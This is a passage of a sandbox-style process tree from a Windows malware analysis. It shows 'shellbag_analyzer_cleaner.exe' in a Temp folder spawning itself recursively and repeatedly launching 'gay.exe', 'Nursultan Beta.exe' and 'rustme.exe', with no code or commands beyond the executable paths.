C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"16⤵PID:2856
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"15⤵PID:2016
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"14⤵PID:5768
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"13⤵PID:948
-
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"12⤵PID:1376
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"12⤵PID:5756
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"11⤵PID:5868
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"11⤵PID:5508
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"11⤵PID:4912
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"10⤵PID:1840
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"10⤵PID:5688
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"10⤵PID:2144
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"9⤵PID:2816
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"10⤵PID:1116
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"11⤵PID:5788
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"12⤵PID:5848
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"13⤵PID:2392
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"14⤵PID:5812
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"15⤵PID:5744
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"16⤵PID:5048
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"17⤵PID:4556
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"18⤵PID:3752
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"19⤵
- Checks computer location settings
PID:3508 -
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"20⤵PID:5172
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"21⤵
- Checks computer location settings
PID:5552 -
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"22⤵PID:5012
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"23⤵PID:3620
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"24⤵PID:4624
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"25⤵PID:6000
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"26⤵PID:3864
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"27⤵PID:2972
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"27⤵PID:744
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"26⤵PID:512
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"25⤵PID:5380
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"24⤵PID:5784
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"23⤵PID:4292
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"22⤵PID:3604
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"21⤵PID:5748
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"20⤵PID:2060
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"19⤵PID:592
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"18⤵PID:4800
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"17⤵PID:2932
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"16⤵PID:3892
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"15⤵PID:5508
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"14⤵PID:5536
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"13⤵PID:2348
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"12⤵PID:6028
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"11⤵PID:724
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"10⤵PID:5728
-
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"9⤵PID:3812
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"9⤵PID:2032
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"8⤵PID:1968
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"9⤵PID:5172
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"10⤵
- Checks computer location settings
PID:4440 -
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"11⤵PID:2944
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"12⤵PID:3904
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"13⤵PID:3812
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"14⤵PID:5964
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"14⤵PID:4368
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"13⤵PID:3892
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"12⤵PID:5400
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"11⤵PID:5184
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"10⤵PID:3080
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"9⤵PID:5264
-
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"8⤵PID:3056
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"8⤵PID:4428
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"7⤵PID:5508
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"8⤵PID:3604
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"9⤵PID:6000
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"10⤵PID:4316
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"11⤵PID:1104
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"12⤵PID:3736
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"13⤵PID:6020
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"14⤵PID:6036
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"15⤵PID:5356
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"16⤵PID:2924
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"17⤵PID:1868
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"18⤵PID:2140
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"19⤵PID:4540
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"20⤵PID:1088
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"21⤵PID:4636
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"22⤵PID:5024
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"23⤵PID:4396
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"24⤵PID:1676
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"25⤵PID:3752
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"26⤵PID:1128
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"27⤵PID:5056
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"28⤵PID:5660
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"29⤵PID:4556
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"30⤵PID:5248
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"31⤵PID:2580
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"32⤵PID:4004
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"33⤵PID:672
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"34⤵PID:5756
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"35⤵PID:5996
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"36⤵PID:1604
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"37⤵PID:3952
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"38⤵PID:5544
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"39⤵PID:3376
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"40⤵PID:2848
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"41⤵PID:2864
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"42⤵PID:5316
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"43⤵PID:544
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"44⤵PID:1128
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"44⤵PID:2992
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"43⤵PID:4980
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"42⤵PID:1968
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"41⤵PID:5812
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"40⤵PID:5660
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"39⤵PID:4372
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"38⤵PID:5132
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"37⤵PID:5836
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"36⤵PID:2980
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"35⤵PID:64
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"34⤵PID:5816
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"33⤵PID:4536
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"32⤵PID:4524
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"31⤵PID:4512
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"30⤵PID:3684
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"29⤵PID:5588
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"28⤵PID:5308
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"27⤵PID:3796
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"26⤵PID:5472
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"25⤵PID:996
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"24⤵PID:5276
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"23⤵PID:5616
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"22⤵PID:5188
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"21⤵PID:5740
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"20⤵PID:6108
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"19⤵PID:2568
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"18⤵PID:6088
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"17⤵PID:2296
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"16⤵PID:5544
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"15⤵PID:5600
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"14⤵PID:5848
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"13⤵PID:2472
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"12⤵PID:6116
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"11⤵PID:5516
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"10⤵PID:4008
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"9⤵PID:5544
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"8⤵PID:5964
-
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"7⤵PID:780
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"7⤵PID:448
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"6⤵PID:2032
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"7⤵PID:2932
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"8⤵PID:624
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"9⤵PID:452
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"10⤵PID:6112
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"11⤵PID:3580
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"12⤵PID:3604
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"13⤵PID:6000
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"13⤵PID:3556
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"12⤵PID:5072
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"11⤵PID:2348
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"10⤵PID:5380
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"9⤵PID:5848
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"8⤵PID:5128
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"7⤵PID:5816
-
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"6⤵PID:4408
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"6⤵PID:3904
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3904 -s 7247⤵PID:5388
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"5⤵PID:856
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"6⤵PID:4636
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"7⤵PID:1628
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"8⤵PID:3508
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"9⤵PID:3676
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"10⤵
- Checks computer location settings
PID:5020 -
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"11⤵PID:5208
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"12⤵PID:2568
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"13⤵PID:5744
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"13⤵PID:3596
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"12⤵PID:2016
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"11⤵PID:2564
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"10⤵PID:1128
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"9⤵PID:724
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"8⤵PID:1728
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"7⤵PID:3652
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"6⤵PID:5284
-
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"5⤵PID:3972
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"5⤵PID:3928
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"4⤵PID:2816
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"4⤵PID:5160
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"4⤵PID:624
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"3⤵PID:6100
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"4⤵PID:4416
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"5⤵PID:6020
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"6⤵PID:4316
-
